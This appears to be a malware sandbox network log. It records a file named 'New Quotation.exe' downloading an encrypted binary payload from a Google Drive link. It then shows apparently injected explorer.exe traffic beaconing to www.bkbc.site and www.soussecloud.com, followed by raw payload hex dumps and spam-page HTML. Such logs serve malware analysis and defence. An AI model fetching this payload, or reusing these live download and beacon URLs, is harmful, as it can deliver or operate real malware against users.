39 3b 26 23 32 36 30 38 30 3b 26 23 33 30 37 32 31 3b 26 23 32 32 32 36 39 3b 26 23 32 30 31 33 35 3b 26 23 32 30 31 32 32 3b 26 23 32 37 39 35 34 3b 2c 26 23 32 30 32 33 34 3b 26 23 32 30 31 35 34 3b 26 23 33 33 33 39 34 3b 26 23 33 32 35 30 38 3b 26 23 32 31 35 31 32 3b 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 32 32 38 32 35 3b 26 23 32 32 38 32 35 3b 26 23 32 33 35 36 37 3b 26 23 32 39 32 35 35 3b 2c 26 23 33 39 36 34 30 3b 26 23 32 38 35 32 36 3b 26 23 31 31 38 3b 26 23 31 30 35 3b 26 23 31 30 30 3b 26 23 31 30 31 3b 26 23 31 31 31 3b 26 23 31 31 35 3b 26 23 31 31 31 3b 26 23 31 31 34 3b 26 23 31 30 33 3b 26 23 39 37 3b 26 23 31 31 35 3b 26 23 31 30 39 3b 26 23 32 35 32 37 37 3b 26 23 32 35 36 31 36 3b 26 23 32 31 35 31 32 3b 26 23 33 38 35 39 38 3b 2c 26 23 32 32 39 30 39 3b 26 23 32 30 31 30 32 3b 26 23 39 37 3b 26 23 31 31 38 3b 26 23 33 31 35 33 32 3b 26 23 32 32 32 33 35 3b 26 23 33 32 35 30 38 3b 26 23 32 31 35 31 32 3b 26 23 32 36 30 38 30 3b 26 23 33 30 37 32 31 3b 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 26 23 32 32 39 33 31 3b 26 23 32 32 38 39 39 3b 26 23 32 32 39 33 31 3b 26 23 32 32 38 39 39 3b 26 23 32 34 34 33 33 3b 26 23 33 38 34 39 38 3b 26 23 32 32 39 33 31 3b 26 23 32 32 38 39 39 3b 26 23 32 34 34 33 33 3b 26 23 32 34 32 31 31 3b 26 23 32 32 39 33 31 3b 26 23 32 32 38 39 39 3b 26 23 33 32 35 39 33 3b 2c 26 23 32 30 32 33 34 3b 26 23 32 30 31 35 34 3b 26 23 33 33 33 39 34 3b 26 23 33 32 35 30 38 3b 26 23 32 31 35 31 32 3b 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 32 32 38 32 35 3b 26 23 32 32 38 32 35 3b 26 23 32 33 35 36 37 3b 26 23 32 39 32 35 35 3b 2c 26 23 33 39
                                                                                                                                                                                        Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><script>document.title='';</script><title>&#22269;&#20135;&#31934;&#21697;&#22823;&#23617;&#32929;&#30333;&#27974;&#19968;&#21306;&#20108;&#21306;,&#20234;&#20154;&#33394;&#32508;&#21512;&#20037;&#20037;&#22825;&#22825;&#23567;&#29255;,&#39640;&#28526;&#118;&#105;&#100;&#101;&#111;&#115;&#111;&#114;&#103;&#97;&#115;&#109;&#25277;&#25616;&#21512;&#38598;,&#22909;&#20102;&#97;&#118;&#31532;&#22235;&#32508;&#21512;&#26080;&#30721;&#20037;&#20037;</title><meta name="keywords" content="&#38738;&#38738;&#33609;&#26080;&#30721;&#22269;&#20135;&#20122;&#27954;,&#20234;&#20154;&#33394;&#32508;&#21512;&#20037;&#20037;&#22825;&#22825;&#23567;&#29255;,&#39640;&#28526;&#118;&#105;&#100;&#101;&#111;&#115;&#111;&#114;&#103;&#97;&#115;&#109;&#25277;&#25616;&#21512;&#38598;,&#22909;&#20102;&#97;&#118;&#31532;&#22235;&#32508;&#21512;&#26080;&#30721;&#20037;&#20037;" /><meta name="description" content="&#22931;&#22899;&#22931;&#22899;&#24433;&#38498;&#22931;&#22899;&#24433;&#24211;&#22931;&#22899;&#32593;,&#20234;&#20154;&#33394;&#32508;&#21512;&#20037;&#20037;&#22825;&#22825;&#23567;&#29255;,&#39
                                                                                                                                                                                        Jun 10, 2022 07:55:34.713829994 CEST8640INData Raw: 36 34 30 3b 26 23 32 38 35 32 36 3b 26 23 31 31 38 3b 26 23 31 30 35 3b 26 23 31 30 30 3b 26 23 31 30 31 3b 26 23 31 31 31 3b 26 23 31 31 35 3b 26 23 31 31 31 3b 26 23 31 31 34 3b 26 23 31 30 33 3b 26 23 39 37 3b 26 23 31 31 35 3b 26 23 31 30 39
                                                                                                                                                                                        Data Ascii: 640;&#28526;&#118;&#105;&#100;&#101;&#111;&#115;&#111;&#114;&#103;&#97;&#115;&#109;&#25277;&#25616;&#21512;&#38598;,&#22909;&#20102;&#97;&#118;&#31532;&#22235;&#32508;&#21512;&#26080;&#30721;&#20037;&#20037;,&#20122;&#27954;&#22269;&#20135;&#2


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        8192.168.11.2049782185.45.67.19280C:\Windows\explorer.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        Jun 10, 2022 07:55:55.014959097 CEST8641OUTGET /a2c8/?Djf=XJueD6+RsCamebg+m2IDevgDgX6JK6+fg1om2YuoQAjiRITTUmGQ1TK81l5L26OUxDMt&6lbL=qTfTz0 HTTP/1.1
                                                                                                                                                                                        Host: www.bkbc.site
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                        Jun 10, 2022 07:55:55.078900099 CEST8642INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                        Date: Fri, 10 Jun 2022 05:55:54 GMT
                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                        x-frame-options: SAMEORIGIN
                                                                                                                                                                                        referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                        cross-origin-opener-policy: same-origin
                                                                                                                                                                                        Expires: Wed, 17 Aug 2005 00:00:00 GMT
                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Set-Cookie: e56e29cb9a62b3a100cc77985a61d02f=c870d72e0b4716f504541a3fcad74f30; path=/; secure; HttpOnly
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Upgrade: h2,h2c
                                                                                                                                                                                        Connection: Upgrade, close
                                                                                                                                                                                        Location: https://www.bkbc.site/a2c8/?Djf=XJueD6+RsCamebg+m2IDevgDgX6JK6+fg1om2YuoQAjiRITTUmGQ1TK81l5L26OUxDMt&6lbL=qTfTz0
                                                                                                                                                                                        Last-Modified: Fri, 10 Jun 2022 05:55:54 GMT
                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        9192.168.11.204978446.38.243.23480C:\Windows\explorer.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        Jun 10, 2022 07:56:15.261794090 CEST8650OUTGET /a2c8/?6lbL=qTfTz0&Djf=Le51HqdCnUjRonUOENSF5PHY57eFe7/AO9vFjh8TXkRU4Y1PyjhZUj1LAkJkXoaSSV0M HTTP/1.1
                                                                                                                                                                                        Host: www.soussecloud.com
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                        Jun 10, 2022 07:56:15.277812004 CEST8650INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Date: Fri, 10 Jun 2022 05:56:15 GMT
                                                                                                                                                                                        Server: Apache/2.4.10 (Debian)
                                                                                                                                                                                        Content-Length: 281
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 73 6f 75 73 73 65 63 6c 6f 75 64 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.10 (Debian) Server at www.soussecloud.com Port 80</address></body></html>


                                                                                                                                                                                        HTTPS Proxied Packets

                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        0192.168.11.2049764142.250.186.110443C:\Users\user\Desktop\New Quotation.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-06-10 05:52:16 UTC0OUTGET /uc?export=download&id=1pkJqJeYBgsKa6ou6xByI4DdGT3NGirLb HTTP/1.1
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                        Host: drive.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-06-10 05:52:16 UTC0INHTTP/1.1 303 See Other
                                                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Fri, 10 Jun 2022 05:52:16 GMT
                                                                                                                                                                                        Location: https://doc-14-as-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/do4pmedip159iep2454spmaehd0b8seb/1654840275000/03850461078914778055/*/1pkJqJeYBgsKa6ou6xByI4DdGT3NGirLb?e=download
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'nonce-bGImDWxi4kxZ_2SJ6NcTeQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Connection: close


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        1192.168.11.2049765172.217.19.65443C:\Users\user\Desktop\New Quotation.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-06-10 05:52:17 UTC1OUTGET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/do4pmedip159iep2454spmaehd0b8seb/1654840275000/03850461078914778055/*/1pkJqJeYBgsKa6ou6xByI4DdGT3NGirLb?e=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Host: doc-14-as-docs.googleusercontent.com
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        2022-06-10 05:52:17 UTC1INHTTP/1.1 200 OK
                                                                                                                                                                                        X-GUploader-UploadID: ADPycdt7QRsWXcZBKQ4cH1AgwI_kEpm737lhGA-cqovexjPInLNoSV-9x45TIsI1uRPJ1VqWyK66s6MRV3iy2954_JP0BxiXUATH
                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                        Access-Control-Allow-Credentials: false
                                                                                                                                                                                        Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-ViewerInfo, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment
                                                                                                                                                                                        Access-Control-Allow-Methods: GET,OPTIONS
                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                        Content-Disposition: attachment;filename="bin_jiGLT67.bin";filename*=UTF-8''bin_jiGLT67.bin
                                                                                                                                                                                        Content-Length: 189504
                                                                                                                                                                                        Date: Fri, 10 Jun 2022 05:52:17 GMT
                                                                                                                                                                                        Expires: Fri, 10 Jun 2022 05:52:17 GMT
                                                                                                                                                                                        Cache-Control: private, max-age=0
                                                                                                                                                                                        X-Goog-Hash: crc32c=lIt3sQ==
                                                                                                                                                                                        Server: UploadServer
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        2022-06-10 05:52:17 UTC5INData Raw: bb 15 53 18 c7 c2 64 8e ac 22 d8 b8 90 5f bd 83 d8 5c a6 71 34 19 a9 1f 54 ce bf 09 ab 4d 1a 19 d0 95 41 75 5d c6 1c d6 b4 82 d1 36 df c8 fb e6 42 4e 4c ef 7d 25 b8 3d 0f 92 9c 75 e2 6d 4f e7 b4 24 25 62 ae 43 71 1d 15 15 56 00 50 db f6 0a d5 36 67 7c 91 21 1d db 76 c9 50 d1 6a 78 15 3e d5 96 c1 49 1f 00 c9 5f 64 70 c6 ac dd 76 4d d3 d9 1b 2a 6b 3c 60 21 91 32 9e b6 db 05 81 91 48 a8 71 3c 17 47 d0 e1 f0 8e 93 e8 97 d8 cc dc 2a 1d 63 8c 28 18 ea b4 c0 40 0b 19 e4 a7 7d 5d b2 55 20 c5 b8 ba a6 f7 96 32 b7 9e 47 f8 f6 b7 a4 1d 62 ef c6 64 61 09 8c 36 96 46 9c f6 0b 26 4a e2 20 5f 6a 61 9f a5 71 98 ab 8c 8c 26 fe 23 ec 86 20 96 2f 32 85 05 2b 01 f9 66 fe bf 47 a9 a9 51 67 54 6f 3a 0e 10 91 bd 14 72 4e cd 07 9d 62 d7 0f 93 c1 26 ae 6c 1c 67 81 25 48 4b 1a b7
                                                                                                                                                                                        Data Ascii: Sd"_\q4TMAu]6BNL}%=umO$%bCqVP6g|!vPjx>I_dpvM*k<`!2Hq<G*c(@}]U 2Gbda6F&J _jaq&# /2+fGQgTo:rNb&lg%HK
                                                                                                                                                                                        2022-06-10 05:52:17 UTC9INData Raw: 49 fb 63 31 93 7f 8c 70 6b 25 b2 77 b5 e8 50 8f a2 b5 f3 a0 5f 87 5a b6 00 43 6d e9 0f 61 a6 c0 c7 51 8d 38 0c ad 91 d3 35 63 68 fa f8 7f e5 bb 40 ff 66 66 7c 80 48 4c f6 2e 13 37 9d bf 7d 2f 1f 22 eb db 76 34 cd 99 65 a0 0a c4 d0 4b 44 ed 7f c2 6a 4a da 83 84 a3 59 61 cc e3 6c ce f1 14 95 62 ac c5 04 df 78 6a 7e 66 fd 1e d6 ce 9f 45 3b e4 08 5a ee 31 ba 71 10 da 05 22 c7 5f 02 d3 96 64 e0 6e 89 67 90 1e bc e0 f8 b9 04 23 8a a4 83 d1 55 12 07 94 27 82 a3 2c 8f 50 1f 5a 5a 81 37 bb f2 54 e0 6f 07 93 ce 9b 98 8b 9c fb 37 c7 d3 6e 6c fe 2e 5c 2f 20 06 5c 2a b8 6d c3 94 11 d0 ad 4e bd 39 f1 f0 7c fa aa 8b 3a 67 7a 46 68 25 a9 40 64 67 0e 35 c6 7c f2 31 3e 5e 62 7f d9 5b 12 67 4d 56 c2 23 fa d6 c1 31 7e 5a a3 20 fa 8e 38 0c 73 38 3b d6 9c f7 2a aa 6f 5c f4 b8
                                                                                                                                                                                        Data Ascii: Ic1pk%wP_ZCmaQ85ch@ff|HL.7}/"v4eKDjJYalbxj~fE;Z1q"_dng#U',PZZ7To7nl.\/ \*mN9|:gzFh%@dg5|1>^b[gMV#1~Z 8s8;*o\
                                                                                                                                                                                        2022-06-10 05:52:17 UTC13INData Raw: 5b 02 2a 5d 1d 23 a2 0e 34 ea 9a 55 d4 4e 08 ba db 46 af 30 a4 ff 3c dc f9 ea 59 e3 2a 2b 20 33 dd 37 3a ba 1c 92 0e c7 6e 72 fd 69 ce c9 20 96 86 cf 80 5f 09 d3 e3 fa 6d 38 cc 7c 75 34 87 34 7f 30 98 40 0b 52 a1 20 48 c9 f7 54 9a 23 46 bc e4 91 ac 0d 9c 62 c3 6b 11 3e 10 dc ce 05 de 4b a7 a6 f9 6a 39 57 e5 18 4b 2e 11 4c 5c e3 38 15 ed 24 46 6e f8 2a 1d 8e b0 de 0e 44 12 0a 54 a7 2f 7d 48 68 a0 5c a9 48 72 3f 1c 50 bb 04 14 62 71 99 0d 1a 6e 82 0e 8b ed 6e 19 75 b9 cb bc bc c9 c2 87 bb 49 c1 a9 56 49 ce c7 ed 8a e9 1b dd 67 43 62 f9 c2 f6 35 c7 0d 9e 36 51 c8 56 ff c2 8f d3 3e b5 bd 36 85 88 ae 2f a3 be 73 29 f3 bb 86 04 9d 45 24 43 37 69 5c 9e 2c 1e 56 93 81 c9 a1 99 22 8d fa 0f 7b 7d b6 dd 98 e2 e4 99 4c 3f 94 28 d1 e8 1a ba 77 84 a9 be f7 00 0e 6c 86
                                                                                                                                                                                        Data Ascii: [*]#4UNF0<Y*+ 37:nri _m8|u440@R HT#Fbk>Kj9WK.L\8$Fn*DT/}Hh\Hr?PbqnnuIVIgCb56QV>6/s)E$C7i\,V"{}L?(wl
                                                                                                                                                                                        2022-06-10 05:52:17 UTC17INData Raw: 9d 65 19 56 71 05 20 96 2a d6 6a a1 c1 ba 4e 2f 68 34 8b 70 df 14 4b 75 cb 27 6a 06 2f ed a6 42 4b 71 1d 47 a5 ac 78 58 50 54 85 98 8f 1c 82 6d 1f ce 96 d0 ce 51 2e 8b b9 fd 5a 45 97 c1 ca db 30 96 d4 a2 2e 4d 49 80 b5 6a 86 87 e7 8e 79 f8 4e 03 c4 b9 72 3d 96 d5 0a 90 c3 f3 62 d5 4f 10 ef 18 fc 61 23 68 3d 15 12 88 bd b5 d0 a4 7d 95 85 2c b2 2a 96 b0 b5 4d 62 37 56 df c1 68 d5 1b 33 82 07 12 21 31 a1 b4 38 02 7b 70 f2 8b a8 b4 e5 7e 82 99 e7 4e 17 08 ca e9 42 c8 3b 57 7f 8e fd 02 0e 7f b7 0c ca c9 9c 45 5e 8c a9 21 9e 10 69 6f 1f b7 fd 15 b9 92 15 c7 91 42 67 50 d6 2b 52 b0 20 6e 9b ee 26 dd 9a f0 25 5e 75 9f 4a 57 be e7 e2 a6 4e 2d c9 ac 1a 48 66 92 bb 55 9a a5 05 96 11 c1 38 6d cd 5b f8 c2 90 ca a6 dd ed f2 e7 8e 62 30 50 f2 f8 d1 e4 b0 7b e9 4e 5e d0
                                                                                                                                                                                        Data Ascii: eVq *jN/h4pKu'j/BKqGxXPTmQ.ZE0.MIjyNr=bOa#h=},*Mb7Vh3!18{p~NB;WE^!ioBgP+R n&%^uJWN-HfU8m[b0P{N^
                                                                                                                                                                                        2022-06-10 05:52:17 UTC17INData Raw: 63 bc c9 7a ca 1b 45 4f 7d 37 db 1d 85 b7 c8 1b 26 de f1 4a d4 44 9e d3 b4 30 7e 39 be 20 18 1a 7a 36 01 ba 68 ca 91 ea 67 e4 7e 32 dc 68 2b d7 2f ac a6 39 7f dd ca f9 c5 a8 bb c2 8b 4d 6a f3 c8 db ba b6 b3 49 ba 57 66 88 79 91 29 4e 5d 44 73 1b e3 8c b3 20 de b6 f3 e5 02 34 23 38 eb f1 50 c5 10 df b9 c1 5e 35 8c b1 82 c1 d9 fe 35 6b c4 26 4a 75 12 05 56 23 88 a6 a1 5a 4e 6e c2 58 3f 55 73 90 9d 70 61 1e eb ce 79 28 27 95 f9 7e eb 6c de 47 f0 fa ea 4d d5 e8 d2 2c 86 8d d4 c1 e4 bd 5d f0 ad c4 d5 b7 a4 af 6c 17 15 3e d5 1d bd f1 1b c1 0e 57 57 af 4d d1 31 b7 b2 cb 58 fc d5 6b 3c 60 12 cd 8a 9a 3d a6 39 b2 c8 50 67 91 8e 90 1a 90 63 60 5f ea 12 cb 94 0a 77 42 74 10 27 24 d2 81 52 51 de 66 39 87 4d 4f ab d9 e0 cf b7 1c 51 dc b1 03 99 83 1c e6 5f 46 e4 84 70
                                                                                                                                                                                        Data Ascii: czEO}7&JD0~9 z6hg~2h+/9MjIWfy)N]Ds 4#8P^55k&JuV#ZNnX?Uspay('~lGM,]l>WWM1Xk<`=9Pgc`_wBt'$RQf9MOQ_Fp
                                                                                                                                                                                        2022-06-10 05:52:17 UTC19INData Raw: b6 8b 3f d5 ed 8e 83 59 c0 c7 51 06 6c 9c a9 10 34 35 63 97 05 39 98 ed 3a a2 ff 66 99 7c b3 b2 8d 08 26 92 d1 62 bf 7d 2f 94 76 5b df f7 d6 cd 66 65 a0 39 3e 5b 1e b0 6c 9d 3d 6a 4a da 8c 32 e7 c9 64 ff 1b 5f b7 fd 9f 5a a3 65 cd 85 3e 78 95 7e 99 3c d9 de 4f 78 ba 3b 1b 08 51 21 6e e4 f8 5b d6 5e a9 22 02 c1 73 d0 00 68 fb a7 f3 15 4b 37 0c 73 fc 0c 75 07 14 a7 d8 55 12 82 62 52 87 90 ec d1 0d dc d1 17 91 ba af 3f 54 e0 6f 07 18 83 97 ca da ca ab df 53 24 91 93 7d ea 4c aa e0 7e 82 a3 3e 9d c3 94 11 5b 6b 10 e0 fa 3d 3c 29 71 46 00 7f 73 f1 0b 64 ae 38 b0 64 67 0e 65 4d 39 fa 63 b5 0b 72 97 5d a2 ed 98 ce 92 ca 7e 39 ee 7a fa ff c4 18 52 29 9d 64 dd 47 84 7b 07 c9 7c c6 21 2a 50 9c 4c 71 a4 da b1 a6 29 d8 c6 36 48 a2 ed ae 63 0b 88 46 b6 23 ca 4c 5b 0e
                                                                                                                                                                                        Data Ascii: ?YQl45c9:f|&b}/v[fe9>[l=jJ2d_Ze>x~<Ox;Q!n[^"shK7suUbR?ToS$}L~>[k=<)qFsd8dgeM9cr]~9zR)dG{|!*PLq)6HcF#L[
                                                                                                                                                                                        2022-06-10 05:52:17 UTC20INData Raw: 97 12 29 9c dc be 62 47 c3 7e 71 97 07 b5 17 f4 52 6e 2f 25 0d 80 86 97 11 a6 74 b5 63 22 13 69 4c 34 43 36 25 28 0e b1 cb e9 57 2a 72 44 13 38 dc a5 7b ac 5a 3c 64 4e 3d 53 b1 97 b0 a5 c8 ae 65 4b ca 5a 3f fc c5 01 42 c9 f9 0e 98 94 1f 0d ee 9a 82 7c 72 c0 28 a6 04 d3 5a 3c b2 61 d3 37 f4 f9 12 50 7f 52 39 2f c6 57 08 0c 29 9f 2e 59 e5 99 38 ad af 20 d7 2f c9 a0 de 93 4e b1 01 f6 7a 6f 0f 2f 03 f0 86 25 07 9a 16 ed f1 be dc 3a 10 26 9b 2a ec 9e 77 b3 cb 1c d9 ea 22 a4 66 80 e1 07 47 02 79 79 5f 8a 6f 9b 33 e8 1c 55 26 f5 78 ca 7e 32 0a be 36 b3 61 a5 4d 93 e6 2a db 8a d2 97 ad 2e 6e 84 56 4d 19 6b 60 6d 8b 17 18 51 3a ca cb 53 13 d9 5e 60 30 15 85 f5 25 f5 09 d7 e8 59 db b0 a9 35 0a ec 2d 1f 76 06 7f 5e ca 0a a3 14 08 51 3c d5 c5 29 25 9d 01 c9 d4 e2 64
                                                                                                                                                                                        Data Ascii: )bG~qRn/%tc"iL4C6%(W*rD8{Z<dN=SeKZ?B|r(Z<a7PR9/W).Y8 /Nzo/%:&*w"fGyy_o3U&x~26aM*.nVMk`mQ:S^`0%Y5-v^Q<)%d
